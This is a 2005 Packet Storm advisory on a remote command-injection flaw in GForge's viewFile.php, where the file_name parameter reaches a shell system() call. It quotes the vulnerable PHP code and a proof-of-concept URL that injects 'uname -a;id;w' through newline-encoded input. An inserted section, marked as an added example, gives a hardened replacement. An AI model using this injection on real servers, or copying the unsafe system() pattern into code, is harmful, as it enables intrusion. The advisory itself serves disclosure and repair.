gforgeexec.txt

2005-08-14T00:00:00
ID PACKETSTORM:39304
Type packetstorm
Reporter Filippo Spike Morelli
Modified 2005-08-14T00:00:00

Description

                                        
                                            `--------------------------------------------------------------------------  
Vendor : Gforge (http://gforge.org)  
Product : gforge  
Affected versions : < 4.0  
Bug fixed : >= 4.0 & Debian pkg 3.1-30  
Vulnerability : Input validation flaw  
Problem-Type : remote  
Severity : High, arbitrary command execution  
  
Author : Filippo Spike Morelli  
--------------------------------------------------------------------------  
  
  
--------------------------------------------------------------------------  
Background  
--------------------------------------------------------------------------  
  
GForge helps you manage the entire development life cycle.
  
GForge has tools to help your team collaborate, like message forums and  
mailing lists; tools to create and control access to Source Code Management  
repositories like CVS and Subversion. GForge automatically creates a  
repository and controls access to it depending on the role settings of the  
project.  
  
--------------------------------------------------------------------------  
Bug Description  
--------------------------------------------------------------------------  
The scm component shipped with gforge has a bug in the viewFile.php script.  
This script is supposed to serve a file info request, outputting its  
history, diffs, and all the other relevant info stored in the repository.  
The file_name parameter is not properly validated, so a properly crafted
URL can lead to arbitrary command execution under the uid the webserver
runs as.
  
Files involved:  
$GFORGE/www/scm/viewFile.php  
$GFORGE/common/include/cvsweb/RCSHandler.class  
  
The problem is that the "file_name" URL field is not properly validated.
  
$GFORGE/www/scm/viewFile.php
.....
if($allow)
{
    $DHD = new DirectoryHandler();
    $FHD = new FileHandler();
    $RCH = new RCSHandler();

    $CVSROOT = $GLOBALS['sys_cvsroot_dir'].$cvsroot;
    $DIRNAME = ($file_name != "")?"$file_name":"";
    $DIRNAME = $CVSROOT.$DIRNAME;
    ....
    $RCSFile = $DIRNAME.",v";
    switch($view_action)
    {
        case "l":
            if(false === $RCH->getRCSLog($RCSFile))
                echo("Error: ".$RCH->getError());
.....
  
$GFORGE/common/include/cvsweb/RCSHandler.class  
The RCSHandler class takes care of managing the RCS log and diffs for the
requested file, and it is there that the malicious code is actually executed.
......
function getRCSLog($RCSFILE,$REV="all")
{
    $rev = "";
    if($REV != "all")
        $rev = "-r$REV";

    $file = $this->generateTemp();
    $cmd = "rlog $rev $RCSFILE > $file";
    if(false === ($result = system($cmd)))
                             ^^^^^^^^^^^^^
    {
        $this->setError("Could not execute '$cmd'");
        return false;
    }
.....
  
It is this system() call that executes the malicious code carried in $cmd.
  
  
--------------------------------------------------------------------------  
PoC  
--------------------------------------------------------------------------  
  
The analyzed command is "uname -a;id;w"  
  
gforge/xxxx/xx/xx/gforge.log:xxx.xxx.xxx.xxx [xx/xxx/xxxx:xx:xx:xx +xxxx]  
"GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a  
HTTP/1.1" 200 2977  
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Maxthon;  
.NET CLR 1.1.4322)"  
  
----- "file_name=%0Auname%20-a;id;w%0a" -----  
%0a (or %0A) = hexadecimal (URL-encoded) code for <return>.
%20 = hexadecimal (URL-encoded) code for <space>.
---> "file_name=<return>uname -a;id;w<return>"  
  
Looking at the viewFile.php source code:
$DIRNAME = ($file_name != "")?"$file_name":"";  
so $DIRNAME = <return>uname -a;id;w<return>  
$RCSFile = $DIRNAME.",v";  
so $RCSFile = <return>uname -a;id;w<return>,v  
...  
$cmd = "rlog $rev $RCSFILE > $file";  
so $cmd = rlog all <return>uname -a;id;w<return>,v > $file  
  
if(false === ($result = system($cmd)))  
and then system executes:  
  
1. rlog all, which gives back an error because of the non-existing path
2. <return>  
3. uname -a;id;w  
4. <return>  
5. and eventually the last part of the string, ",v", which gives back the  
error message "sh: ,v: command not found"  
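As an added example (not GForge's own code), the following is a hardened replacement for the getRCSLog() call path analysed above: file_name is checked against a conservative whitelist, canonicalised under the CVS root, and handed to rlog through escapeshellarg() and exec() instead of a shell-interpolated system() string, so the %0a payload from the PoC is rejected before any command runs. The names resolveRcsFile() and getRCSLogSafe() are assumptions; $cvsroot and $file_name follow the advisory.

```php
<?php
// Added example, not GForge code. Helper names are hypothetical.

// Return the canonical ",v" path for $file_name, or null if the request
// must be rejected.
function resolveRcsFile(string $cvsroot, string $file_name): ?string
{
    // Whitelist: no control characters (%0a/%0d), no shell metacharacters
    // such as ';', '|', '>' or '$'. Anything else is rejected outright.
    if ($file_name === '' || !preg_match('#^[A-Za-z0-9_./+-]+$#', $file_name)) {
        return null;
    }
    // Conservative: refuse any ".." segment rather than trying to normalise it.
    if (strpos($file_name, '..') !== false) {
        return null;
    }
    $root = realpath($cvsroot);
    $path = realpath($cvsroot . '/' . $file_name . ',v');
    // realpath() is false when the ,v file does not exist; the prefix check
    // keeps symlinked files from escaping the repository root.
    if ($root === false || $path === false) {
        return null;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Run rlog with every argument shell-quoted and capture its output with
// exec() instead of redirecting through a shell-parsed "> $file" string.
// Returns the log lines, or null on rejection or rlog failure.
function getRCSLogSafe(string $cvsroot, string $file_name, string $rev = 'all'): ?array
{
    $rcsFile = resolveRcsFile($cvsroot, $file_name);
    if ($rcsFile === null) {
        return null;
    }
    $args = array();
    if ($rev !== 'all') {
        // Revisions are dotted numbers only (e.g. 1.12); nothing else reaches rlog.
        if (!preg_match('/^[0-9]+(\.[0-9]+)*$/', $rev)) {
            return null;
        }
        $args[] = '-r' . escapeshellarg($rev);
    }
    $args[] = escapeshellarg($rcsFile);
    exec('rlog ' . implode(' ', $args), $output, $status);
    return $status === 0 ? $output : null;
}
```

With this in place the PoC value "\nuname -a;id;w\n" fails the whitelist in resolveRcsFile() and the handler returns null without ever spawning a shell.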
  
--------------------------------------------------------------------------  
Solution  
--------------------------------------------------------------------------  
  
The vendor has been contacted and they promptly worked on a fix. At the time
of writing the Debian package available in Sid (gforge 3.1-30) has been
fixed. As a temporary fix it is possible to disable the scm component, or
just upgrade to the latest version.
  
  
regards,  
  
--   
Filippo Spike Morelli - Miu-ft System Administrator  
....................................  
.... follow the white rabbit ....  
... wait no, follow alice, she's so cute...  